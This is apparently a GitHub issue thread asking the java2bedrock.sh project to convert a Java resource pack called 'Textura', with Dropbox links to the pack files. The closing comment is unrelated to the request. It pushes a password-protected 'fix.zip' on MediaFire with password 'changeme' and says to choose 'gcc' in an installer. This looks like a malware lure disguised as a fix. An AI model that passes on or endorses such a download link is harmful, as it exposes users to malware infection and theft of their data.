### ISSUE TITLE
[Pack]: Textura

### ISSUE THREAD

**Issue by Faryha** [Kas-tle/java2bedrock.sh#33506]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/9be9l0ibkt8ux6sytvxq3/pack.zip?rlkey=4oei5pkk06wrpln3x9sror0cv&st=dd9h3eox&dl=1

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/azcqwy7ahcrij6qy7qezk/bedrockpack.rar?rlkey=1kdiqfbrittv0g05xhhwgwiko&st=xyj7mwcr&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
